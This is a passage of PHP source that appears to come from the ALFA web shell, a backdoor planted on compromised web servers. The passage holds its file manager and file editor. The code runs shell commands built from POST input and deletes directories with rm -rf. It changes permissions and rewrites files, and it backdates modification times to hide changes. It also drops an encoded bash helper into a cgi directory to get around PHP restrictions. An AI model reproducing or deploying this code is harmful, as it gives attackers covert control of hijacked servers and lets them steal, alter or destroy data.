3188. if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..')
3189. {
3190. deleteDir(rawurldecode(@$_POST['alfa2']));
3191. alfaEx("rm -rf '" . addslashes($_POST['alfa2']) . "'", false, false);
3192. }
3193. else
3194. {
3195. @unlink(rawurldecode(@$_POST['alfa2']));
3196. }
3197. if (isset($GLOBALS["glob_chdir_false"]))
3198. {
3199. $source = rawurldecode(@$_POST['alfa2']);
3200. if ($source != '..' && !empty($source))
3201. {
3202. if (_alfa_can_runCommand(true, true))
3203. {
3204. alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';rm -rf '" . addslashes($source) . "'");
3205. }
3206. }
3207. }
3208. break;
3209. case 'paste':
3210. if ($_SESSION['act'] == 'copy' && isset($_SESSION['f']))
3211. {
3212. function copy_paste($c, $s, $d)
3213. {
3214. if (@is_dir($c . $s))
3215. {
3216. @mkdir($d . $s);
3217. $h = @opendir($c . $s);
3218. while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
3219. }
3220. elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
3221. }
3222. foreach ($_SESSION['f'] as $f) copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']);
3223. }
3224. elseif ($_SESSION['act'] == 'move' && isset($_SESSION['f']))
3225. {
3226. function move_paste($c, $s, $d)
3227. {
3228. if (@is_dir($c . $s))
3229. {
3230. @mkdir($d . $s);
3231. $h = @opendir($c . $s);
3232. while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
3233. }
3234. elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
3235. }
3236. foreach ($_SESSION['f'] as $f) @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f);
3237. }
3238. elseif ($_SESSION['act'] == 'zip' && isset($_SESSION['f']))
3239. {
3240. if (class_exists('ZipArchive'))
3241. {
3242. $zip = new ZipArchive();
3243. $zipX = "alfa_" . rand(1, 1000) . ".zip";
3244. if ($zip->open($zipX, 1))
3245. {
3246. @chdir($_SESSION['c']);
3247. foreach ($_SESSION['f'] as $f)
3248. {
3249. if ($f == '..') continue;
3250. if (@is_file($_SESSION['c'] . $f)) $zip->addFile($_SESSION['c'] . $f, $f);
3251. elseif (@is_dir($_SESSION['c'] . $f))
3252. {
3253. $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
3254. foreach ($iterator as $key => $value)
3255. {
3256. $key = str_replace('\\', '/', realpath($key));
3257. if (@is_dir($key))
3258. {
3259. if (in_array(substr($key, strrpos($key, '/') + 1) , array(
3260. '.',
3261. '..'
3262. ))) continue;
3263. }
3264. else
3265. {
3266. $zip->addFile($key, $key);
3267. }
3268. }
3269. }
3270. }
3271. @chdir($GLOBALS['cwd']);
3272. $zip->close();
3273. __alert('>> ' . $zipX . ' << is created...');
3274. }
3275. }
3276. }
3277. elseif ($_SESSION['act'] == 'unzip' && isset($_SESSION['f']))
3278. {
3279. if (class_exists('ZipArchive'))
3280. {
3281. $zip = new ZipArchive();
3282. foreach ($_SESSION['f'] as $f)
3283. {
3284. if ($zip->open($_SESSION['c'] . $f))
3285. {
3286. $zip->extractTo($GLOBALS['cwd']);
3287. $zip->close();
3288. }
3289. }
3290. }
3291. }
3292. unset($_SESSION['f']);
3293. break;
3294. default:
3295. if (!empty($_POST['alfa1']))
3296. {
3297. $_SESSION['act'] = @$_POST['alfa1'];
3298. $_SESSION['f'] = @$_POST['f'];
3299. $_SESSION['c'] = @$_POST['c'];
3300. }
3301. break;
3302. }
3303. }
3304. if (isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != '')
3305. {
3306. $dirContent = @scandir($_SESSION[__LAST_CWD__]);
3307. }
3308. else
3309. {
3310. $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
3311. if (preg_match("#(.*)\/\.\.#", $_POST['c'], $res))
3312. {
3313. $path = explode('/', $res[1]);
3314. array_pop($path);
3315. $_POST['c'] = implode('/', $path);
3316. }
3317. $_SESSION[__LAST_CWD__] = str_replace(array(
3318. "..",
3319. "//"
3320. ) , array(
3321. "",
3322. "/"
3323. ) , $_POST['c']);
3324. }
3325. $cmd_dir = false;
3326. if ($dirContent === false)
3327. {
3328. if (_alfa_can_runCommand(true, true))
3329. {
3330. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3331. if (!isset($_SESSION["alfachdir_bash"]) || @!file_exists("alfacgiapi/getdir.alfa"))
3332. {
3333. $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
3334. alfaWriteTocgiapi("getdir.alfa", $bash);
3335. }
3336. if (empty($_SESSION[__LAST_CWD__])) $_SESSION[__LAST_CWD__] = "/";
3337. $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '" . addslashes($_SESSION[__LAST_CWD__]) . "'");
3338. $dirContent = json_decode($dirContent, true);
3339. if (is_array($dirContent))
3340. {
3341. array_pop($dirContent);
3342. $cmd_dir = true;
3343. }
3344. else
3345. {
3346. $dirContent = false;
3347. }
3348. $_SESSION["alfachdir_bash"] = true;
3349. }
3350. }
3351. if ($dirContent == false)
3352. {
3353. echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3354. alfaFooter();
3355. return;
3356. }
3357. global $sort;
3358. $sort = array(
3359. 'name',
3360. 1
3361. );
3362. if (!empty($_POST['alfa1']))
3363. {
3364. if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) $sort = array(
3365. $match[1],
3366. (int)$match[2]
3367. );
3368. }
3369. echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3370. $dirs = $files = array();
3371. $n = count($dirContent);
3372. for ($i = 0;$i < $n;$i++)
3373. {
3374. if ($cmd_dir)
3375. {
3376. $filename = $dirContent[$i]["name"];
3377. $file_owner = $dirContent[$i]["owner"];
3378. $file_group = $dirContent[$i]["group"];
3379. $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3380. $file_perm = alfaPermsColor(array(
3381. "class" => $dirContent[$i]["permcolor"],
3382. "num" => $dirContent[$i]["permnum"],
3383. "human" => $dirContent[$i]["permhuman"]
3384. ) , true);
3385. $file_size = $dirContent[$i]["size"];
3386. $file_path = $_SESSION[__LAST_CWD__] . "/" . $dirContent[$i]["name"];
3387. }
3388. else
3389. {
3390. $filename = $dirContent[$i];
3391. $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS['cwd'] . $filename)) : array(
3392. "name" => "????"
3393. );
3394. $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS['cwd'] . $filename)) : array(
3395. "name" => "????"
3396. );
3397. $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($GLOBALS['cwd'] . $filename) : "????");
3398. $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($GLOBALS['cwd'] . $filename) : "????");
3399. $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3400. $file_perm = alfaPermsColor($GLOBALS['cwd'] . $filename);
3401. $file_size = @filesize($GLOBALS['cwd'] . $filename);
3402. $file_path = $GLOBALS['cwd'] . $filename;
3403. }
3404. $tmp = array(
3405. 'name' => $filename,
3406. 'path' => $file_path,
3407. 'modify' => $file_modify,
3408. 'perms' => $file_perm,
3409. 'size' => $file_size,
3410. 'owner' => $file_owner,
3411. 'group' => $file_group
3412. );
3413. if (!$cmd_dir)
3414. {
3415. if (@is_file($file_path)) $files[] = array_merge($tmp, array(
3416. 'type' => 'file'
3417. ));
3418. elseif (@is_link($file_path)) $dirs[] = array_merge($tmp, array(
3419. 'type' => 'link',
3420. 'link' => readlink($tmp['path'])
3421. ));
3422. elseif (@is_dir($file_path) && ($filename != ".")) $dirs[] = array_merge($tmp, array(
3423. 'type' => 'dir'
3424. ));
3425. }
3426. else
3427. {
3428. if ($dirContent[$i]["type"] == "file")
3429. {
3430. $files[] = array_merge($tmp, array(
3431. 'type' => 'file'
3432. ));
3433. }
3434. else
3435. {
3436. if ($dirContent[$i]["name"] != ".")
3437. {
3438. $dirs[] = array_merge($tmp, array(
3439. 'type' => 'dir'
3440. ));
3441. }
3442. }
3443. }
3444. }
3445. $GLOBALS['sort'] = $sort;
3446. function alfaCmp($a, $b)
3447. {
3448. if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]) , strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
3449. else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
3450. }
3451. usort($files, "alfaCmp");
3452. usort($dirs, "alfaCmp");
3453. $files = array_merge($dirs, $files);
3454. $l = 0;
3455. $cc = 0;
3456. foreach ($files as $f)
3457. {
3458. $f['name'] = htmlspecialchars($f['name']);
3459. $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8') . '...' : $f['name'];
3460. $checkbox = 'checkbox' . $cc;
3461. $raw_name = rawurlencode($f['name']);
3462. $icon = $GLOBALS['DB_NAME']['show_icons'] ? '<img src="' . findicon($f['name'], $f['type']) . '" width="30" height="30">' : '';
3463. $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';
3464. echo '<tr' . ($l ? ' class=l1' : '') . '><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="' . $raw_name . '" class="chkbx" id="' . $checkbox . '"><label for="' . $checkbox . '"></label></div></td><td>' . $icon . '<div style="' . $style . '"><a class="main_name" href=javascript:void(0) onclick="' . (($f['type'] == 'file') ? 'editor(\'' . $raw_name . '\',\'auto\',\'\',\'\',\'\',\'' . $f['type'] . '\');">' . ($GLOBALS['cwd'] . $f['name'] == $GLOBALS['__file_path'] ? "<span class='shell_name' style='font-weight:unset;'>" . $f['name'] . "</span>" : htmlspecialchars($newname)) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td></div><td><span style="font-weight:unset;" class="main_size">' . (($f['type'] == 'file') ? alfaSize($f['size']) : $f['type']) . '</span></td><td><span style="font-weight:unset;" class="main_modify">' . $f['modify'] . '</span></td><td><span style="font-weight:unset;" class="main_owner_group">' . $f['owner'] . '/' . $f['group'] . '</span></td><td><a href=javascript:void(0) onclick="editor(\'' . $raw_name . '\',\'chmod\',\'\',\'\',\'\',\'' . $f['type'] . '\')">' . $f['perms'] . '</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'rename\',\'\',\'\',\'\',\'' . $f['type'] . '\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'touch\',\'\',\'\',\'\',\'' . $f['type'] . '\')">T</a>' . (($f['type'] == 'file') ? ' <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'edit\',\'\',\'\',\'\',\'' . $f['type'] . '\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $raw_name . '\', \'download\')">D</a>' : '') . '<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # ' . addslashes(rawurldecode($f['name'])) . ' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'' . $raw_name . '\') : \'\';"> X </a></td></tr>';
3465. $l = $l ? 0 : 1;
3466. $cc++;
3467. }
3468. echo "<tr><td colspan=7>
3469. <input type=hidden name=a value='FilesMan'>
3470. <input type=hidden name=c value='" . htmlspecialchars((isset($GLOBALS['glob_chdir_false']) ? $_POST['c'] : $GLOBALS['cwd'])) . "'>
3471. <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
3472. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3473. <input type='submit' value=' '>
3474. </form></table></div></div>";
3475. alfafooter();
3476. }
3477. function alfaFilesTools()
3478. {
3479. alfahead();
3480. echo '<div class="filestools">';
3481. if (isset($_POST['alfa1'])) $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3482. $alfa1_decoded = $_POST['alfa1'];
3483. $chdir_fals = false;
3484. if (!@chdir($_POST['c']))
3485. {
3486. $chdir_fals = true;
3487. $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
3488. $alfa_canruncmd = _alfa_can_runCommand(true, true);
3489. if ($alfa_canruncmd)
3490. {
3491. $slashed_alfa1 = addslashes($_POST['alfa1']);
3492. $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "' . $slashed_alfa1 . '"'));
3493. $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3494. }
3495. }
3496. if ($_POST['alfa2'] == 'auto')
3497. {
3498. if (is_array(@getimagesize($_POST['alfa1'])))
3499. {
3500. $_POST['alfa2'] = 'image';
3501. }
3502. else
3503. {
3504. $_POST['alfa2'] = 'view';
3505. if ($chdir_fals)
3506. {
3507. if ($alfa_canruncmd)
3508. {
3509. $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST['alfa1']) . "'"));
3510. $mimetype = $mime[1];
3511. if (!empty($mimetype))
3512. {
3513. if (strstr($mimetype, "image"))
3514. {
3515. $_POST['alfa2'] = 'image';
3516. }
3517. }
3518. }
3519. }
3520. }
3521. }
3522. if ($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1']))
3523. {
3524. $rename_cache = $_POST['alfa3'];
3525. }
3526. if (@$_POST['alfa2'] == 'mkfile')
3527. {
3528. $_POST['alfa1'] = trim($_POST['alfa1']);
3529. if ($chdir_fals && $alfa_canruncmd)
3530. {
3531. if (_alfa_is_writable($_POST["c"]))
3532. {
3533. alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'");
3534. $_POST['alfa2'] = "edit";
3535. }
3536. }
3537. if (!@file_exists($_POST['alfa1']))
3538. {
3539. $fp = @fopen($_POST['alfa1'], 'w');
3540. if ($fp)
3541. {
3542. $_POST['alfa2'] = "edit";
3543. fclose($fp);
3544. }
3545. }
3546. else
3547. {
3548. $_POST['alfa2'] = "edit";
3549. }
3550. }
3551. if (!_alfa_file_exists(@$_POST['alfa1']))
3552. {
3553. echo __pre() . "<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST['alfa4'] . "');</script>";
3554. alfaFooter();
3555. return;
3556. }
3557. if ($chdir_fals)
3558. {
3559. $filesize = $file_info[3];
3560. $uid["name"] = $file_info[1];
3561. $gid["name"] = $file_info[2];
3562. $permcolor = alfaPermsColor(array(
3563. "class" => $perm_color_class,
3564. "num" => $file_info[5],
3565. "human" => $file_info[6]
3566. ) , true);
3567. }
3568. else
3569. {
3570. $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
3571. $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
3572. if (!$uid && !$gid)
3573. {
3574. $uid['name'] = function_exists("fileowner") ? @fileowner($_POST['alfa1']) : '';
3575. $gid['name'] = function_exists("filegroup") ? @filegroup($_POST['alfa1']) : '';
3576. }
3577. $permcolor = alfaPermsColor($_POST['alfa1']);
3578. $filesize = @filesize($_POST['alfa1']);
3579. if (!isset($uid['name'], $gid['name']) || empty($uid['name']) || empty($gid['name']))
3580. {
3581. if (_alfa_can_runCommand())
3582. {
3583. list($uid['name'], $gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "' . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . '"'));
3584. }
3585. }
3586. }
3587. echo '<span class="editor_file_info_vars">Name:</span> ' . htmlspecialchars($alfa1_decoded) . ' <span class="editor_file_info_vars">Size:</span> ' . alfaSize($filesize) . ' <span class="editor_file_info_vars">Permission:</span> ' . $permcolor . ' <span class="editor_file_info_vars">Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . ' <span class="editor_file_info_vars">Directory:</span> ' . str_replace("//", "/", ($chdir_fals ? "" : $_POST['c'] . '/') . $_POST['alfa1']) . '<br><br>';
3588. if (empty($_POST['alfa2'])) $_POST['alfa2'] = 'view';
3589. if (!_alfa_is_dir($_POST['alfa1']))
3590. {
3591. $m = array(
3592. 'View',
3593. 'Edit',
3594. 'Download',
3595. 'Highlight',
3596. 'Chmod',
3597. 'Rename',
3598. 'Touch',
3599. 'Delete',
3600. 'Image',
3601. 'Hexdump'
3602. );
3603. $ftype = "file";
3604. }
3605. else
3606. {
3607. $m = array(
3608. 'Chmod',
3609. 'Rename',
3610. 'Touch'
3611. );
3612. $ftype = "dir";
3613. }
3614. foreach ($m as $v) echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\'):\'\';"><span class="editor_actions">' . ((strtolower($v) == @$_POST['alfa2']) ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\')"><span class="editor_actions">' . ((strtolower($v) == @$_POST['alfa2']) ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a>';
3615. echo '<br><br>';
3616. switch ($_POST['alfa2'])
3617. {
3618. case 'view':
3619. @chdir($_POST['c']);
3620. echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
3621. echo htmlspecialchars(__read_file($_POST['alfa1']));
3622. echo '</pre></div></div>';
3623. break;
3624. case 'highlight':
3625. @chdir($_POST['c']);
3626. if (@is_readable($_POST['alfa1']))
3627. {
3628. echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3629. $code = @highlight_file($_POST['alfa1'], true);
3630. echo str_replace(array(
3631. '<span ',
3632. '</span>'
3633. ) , array(
3634. '<font ',
3635. '</font>'
3636. ) , $code) . '</div></div></div>';
3637. }
3638. break;
3639. case 'delete':
3640. @chdir($_POST['c']);
3641. if (@is_writable($_POST['alfa1']) || isset($GLOBALS["glob_chdir_false"]))
3642. {
3643. $deleted = true;
3644. if (!@unlink($_POST['alfa1']))
3645. {
3646. $deleted = false;
3647. if ($alfa_canruncmd)
3648. {
3649. if (_alfa_is_writable($_POST['alfa1']))
3650. {
3651. alfaEx("rm -f '" . addslashes($_POST['alfa1']) . "'");
3652. $deleted = true;
3653. }
3654. }
3655. }
3656. if ($deleted) echo 'File Deleted...<script>var elem = $("' . $_POST['alfa4'] . '").parentNode;elem.parentNode.removeChild(elem);delete editor_files["' . $_POST['alfa4'] . '"];</script>';
3657. else echo 'Error...';
3658. }
3659. break;
3660. case 'chmod':
3661. @chdir($_POST['c']);
3662. if (!empty($_POST['alfa3']))
3663. {
3664. $perms = 0;
3665. for ($i = strlen($_POST['alfa3']) - 1;$i >= 0;--$i) $perms += (int)$_POST['alfa3'][$i] * pow(8, (strlen($_POST['alfa3']) - $i - 1));
3666. if (!@chmod($_POST['alfa1'], $perms))
3667. {
3668. if ($chdir_fals && $alfa_canruncmd)
3669. {
3670. alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST['alfa3']) . " '" . addslashes($alfa1_decoded) . "'");
3671. echo ('Success!');
3672. }
3673. else
3674. {
3675. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';
3676. }
3677. }
3678. else
3679. {
3680. echo ('Success!');
3681. }
3682. }
3683. clearstatcache();
3684. if ($chdir_fals)
3685. {
3686. $file_perm = $file_info[5];
3687. }
3688. else
3689. {
3690. $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])) , -4);
3691. }
3692. echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.chmod.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="chmod" value="' . $file_perm . '"><input type=submit value=" "></form>';
3693. break;
3694. case 'edit':
3695. @chdir($_POST['c']);
3696. if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1']))
3697. {
3698. echo 'File isn\'t writeable';
3699. break;
3700. }
3701. if (!empty($_POST['alfa3']))
3702. {
3703. $_POST['alfa3'] = substr($_POST['alfa3'], 1);
3704. $time = @filemtime($_POST['alfa1']);
3705. $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
3706. if ($chdir_fals && $alfa_canruncmd)
3707. {
3708. $rname = $alfa1_decoded;
3709. $randname = $rname . rand(111, 9999);
3710. $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname;
3711. if ($fp = @__write_file($filepath, $_POST['alfa3']))
3712. {
3713. alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'");
3714. }
3715. }
3716. if ($fp)
3717. {
3718. echo 'Saved!<br><script>alfa3_="";</script>';
3719. @touch($_POST['alfa1'], $time, $time);
3720. }
3721. }
3722. echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\'' . addslashes($alfa1_decoded) . '\',\'' . $_POST['alfa2'] . '\',\'1\'+this.text.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
3723. echo htmlspecialchars(__read_file($_POST['alfa1']));
3724. echo '</textarea><p><input type="submit" value=" "></p></form>';
3725. break;
3726. case 'hexdump':
3727. @chdir($_POST['c']);
3728. $c = __read_file($_POST['alfa1']);
3729. $n = 0;
3730. $h = array(
3731. '00000000<br>',
3732. '',
3733. ''
3734. );
3735. $len = strlen($c);
3736. for ($i = 0;$i < $len;++$i)
3737. {
3738. $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
3739. switch (ord($c[$i]))
3740. {
3741. case 0:
3742. $h[2] .= ' ';
3743. break;
3744. case 9:
3745. $h[2] .= ' ';
3746. break;
3747. case 10:
3748. $h[2] .= ' ';
3749. break;
3750. case 13:
3751. $h[2] .= ' ';
3752. break;
3753. default:
3754. $h[2] .= $c[$i];
3755. break;
3756. }
3757. $n++;
3758. if ($n == 32)
3759. {
3760. $n = 0;
3761. if ($i + 1 < $len)
3762. {
3763. $h[0] .= sprintf('%08X', $i + 1) . '<br>';
3764. }
3765. $h[1] .= '<br>';
3766. $h[2] .= "\n";
3767. }
3768. }
3769. echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table></div></div>';
3770. break;
3771. case 'rename':
3772. @chdir($_POST['c']);
3773. $alfa1_escape = addslashes($_POST["alfa1"]);
3774. $alfa3_escape = addslashes($_POST["alfa3"]);
3775. if (!empty($_POST['alfa3']))
3776. {
3777. $cmd_rename = false;
3778. if ($chdir_fals && $alfa_canruncmd)
3779. {
3780. if (_alfa_is_writable($_POST['alfa1']))
3781. {
3782. $alfa1_escape = addslashes($alfa1_decoded);
3783. alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa3']) . "'");
3784. }
3785. else
3786. {
3787. $cmd_rename = true;
3788. }
3789. }
3790. else
3791. {
3792. $alfa1_escape = addslashes($_POST["alfa1"]);
3793. }
3794. if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename)
3795. {
3796. echo 'Can\'t rename!<br>';
3797. }
3798. else
3799. {
3800. echo ('Renamed!<script>try{$("' . $_POST['alfa4'] . '").innerHTML = "<div class=\'editor-icon\'>"+loadType(\'' . $alfa3_escape . '\',\'' . $ftype . '\',\'' . $_POST['alfa4'] . '\')+"</div><div class=\'editor-file-name\'>' . $alfa3_escape . '</div>";editor_files["' . $_POST['alfa4'] . '"].file = "' . $alfa3_escape . '";d.files.innerHTML = d.files.innerHTML.replace(/\\\'' . $alfa1_escape . '\\\'/g, "\'' . $alfa3_escape . '\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"' . $alfa1_escape . '\"/, \'value\=\"' . $alfa3_escape . '\"\');d.files.innerHTML = d.files.innerHTML.replace(/' . $alfa1_escape . '\<\/a\>/g, "' . $alfa3_escape . '</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # ' . $alfa1_escape . ' # \?/, "Are You Sure For Delete # ' . $alfa3_escape . ' # ?");' . ($ftype == "dir" ? "updateDirsEditor('" . $_POST['alfa4'] . "','" . $alfa1_escape . "');" : "") . '}catch(e){console.log(e)}</script>');
3801. $alfa1_escape = $alfa3_escape;
3802. }
3803. }
3804. echo '<form onsubmit="editor(\'' . $alfa1_escape . '\',\'' . $_POST['alfa2'] . '\',this.name.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="name" value="' . addslashes(htmlspecialchars(isset($_POST['alfa3']) && $_POST['alfa3'] != '' ? $_POST['alfa3'] : $alfa1_decoded)) . '"><input type=submit value=" "></form>';
3805. break;
3806. case 'touch':
3807. @chdir($_POST['c']);
3808. if (!empty($_POST['alfa3']))
3809. {
3810. $time = strtotime($_POST['alfa3']);
3811. if ($time)
3812. {
3813. $touched = false;
3814. if ($chdir_fals && $alfa_canruncmd)
3815. {
3816. alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa3'])) . "' '" . addslashes($alfa1_decoded) . "'");
3817. $touched = true;
3818. }
3819. if (!@touch($_POST['alfa1'], $time, $time) && !$touched) echo 'Fail!';
3820. else echo 'Touched!';
3821. }
3822. else echo 'Bad time format!';
3823. }
3824. clearstatcache();
3825. echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.touch.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", ($chdir_fals ? $file_info[4] : @filemtime($_POST['alfa1']))) . '"><input type=submit value=" "></form>';
3826. break;
3827. case 'image':
3828. @chdir($_POST['c']);
3829. echo ('<hr>');
3830. $file = $_POST['alfa1'];
3831. $image_info = @getimagesize($file);
3832. if (is_array($image_info) || $chdir_fals)
3833. {
3834. $width = (int)$image_info[0];
3835. $height = (int)$image_info[1];
3836. if ($chdir_fals && $alfa_canruncmd)
3837. {
3838. $source = alfaEx("cat '" . addslashes($file) . "' | base64");
